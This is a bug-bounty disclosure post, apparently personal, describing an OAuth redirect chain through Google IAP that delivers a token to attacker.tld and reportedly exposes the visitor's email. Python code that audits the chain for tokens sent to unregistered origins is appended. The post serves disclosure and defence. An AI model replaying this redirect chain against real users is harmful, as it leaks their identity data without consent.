Google fixed WithPersona's PII leak, then claimed the issue "could not be reproduced".
In Feb. I reported this to Google's Bug Bounty team:

1) User visits https://attacker.tld (this can be intentional or via a pop-under)

2) attacker.tld redirects users via status code 302/301 to the oauth endpoints

2.1) redirect 1: https://accounts.google.com/o/oauth2/v2/auth? client_id=[client-id] &response_type=code &scope=openid email &redirect_uri=https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect &code_challenge=[redacted] &code_challenge_method=S256 &cred_ref=true &state=[redacted]

2.2) redirect 2: https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect? state=[redacted] &code=[redacted] &scope=email openid https://www.googleapis.com/auth/userinfo.email &authuser=0 &prompt=none

2.3) redirect 3: https://attacker.tld/ ?gcp-iap-mode=AUTHENTICATING &redirect_token_v2=[redacted]

3) The user's email address is served directly in the HTTP 401 response as a result of 2.3, on the attacker.tld domain name. From this we know that the user's email address has been shared without consent.

Not having received a response, I assumed it was pending. Weeks later I went back to their portal to double check. They had responded, but only within their portal. The ticket went back and forth, claiming that it wasn't reproducible. Finally, I provided them with the live URL at https://withpersona-gov.com.

Once again they argued that the bug wasn't reproducible. Conveniently, the site had changed to redirect to the main withpersona domain, just 2 days after I provided them with the URL.

Obviously this would have been or still is a massive violation of privacy laws. I feel that I've been gaslit here.
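An added defender-side audit of the redirect chain described in the report (example code, not from the post or from Google): it takes the three hops with the redacted values replaced by constructed placeholders and checks the property the reported chain violates, namely that the hop carrying redirect_token_v2 lands on an origin registered for the client_id. The registry of allowed origins is an assumption for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed registry (assumption): which origins may receive a
# redirect_token_v2 for a given client_id. Real registration data is not on the page.
REGISTERED_ORIGINS = {"client-id-example": {"https://app.example.org"}}

# The three redirects from the report, redacted values replaced by placeholders.
REPORTED_CHAIN = [
    "https://accounts.google.com/o/oauth2/v2/auth?client_id=client-id-example"
    "&response_type=code&scope=openid%20email"
    "&redirect_uri=https://iap.googleapis.com/v1/oauth/clientIds/client-id-example:handleRedirect"
    "&code_challenge=CHALLENGE&code_challenge_method=S256&cred_ref=true&state=STATE",
    "https://iap.googleapis.com/v1/oauth/clientIds/client-id-example:handleRedirect"
    "?state=STATE&code=CODE&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email"
    "&authuser=0&prompt=none",
    "https://attacker.tld/?gcp-iap-mode=AUTHENTICATING&redirect_token_v2=TOKEN",
]


def origin(url: str) -> str:
    """scheme://host[:port] of a URL, the unit an allowlist should be keyed on."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def query(url: str) -> dict:
    """First value of each query parameter."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def audit_chain(chain: list, registry: dict) -> tuple:
    """Return (ok, findings) for a captured redirect chain of the shape in the report."""
    findings = []
    first = query(chain[0])
    cid = first.get("client_id", "")
    # Hop 1 must hand the authorization code to IAP's handler for the same client_id.
    ru = first.get("redirect_uri", "")
    expected_path = f"/clientIds/{cid}:handleRedirect"
    if origin(ru) != "https://iap.googleapis.com" or not urlsplit(ru).path.endswith(expected_path):
        findings.append(f"redirect_uri {ru!r} is not IAP's handler for {cid}")
    # The final hop delivers the IAP token; it must land on an origin registered for the client.
    last = chain[-1]
    if "redirect_token_v2" in query(last) and origin(last) not in registry.get(cid, set()):
        findings.append(f"redirect_token_v2 for {cid} delivered to unregistered origin {origin(last)}")
    return (not findings, findings)
```

Run over the reported chain it flags the final hop to attacker.tld; the same chain ending on a registered origin passes clean.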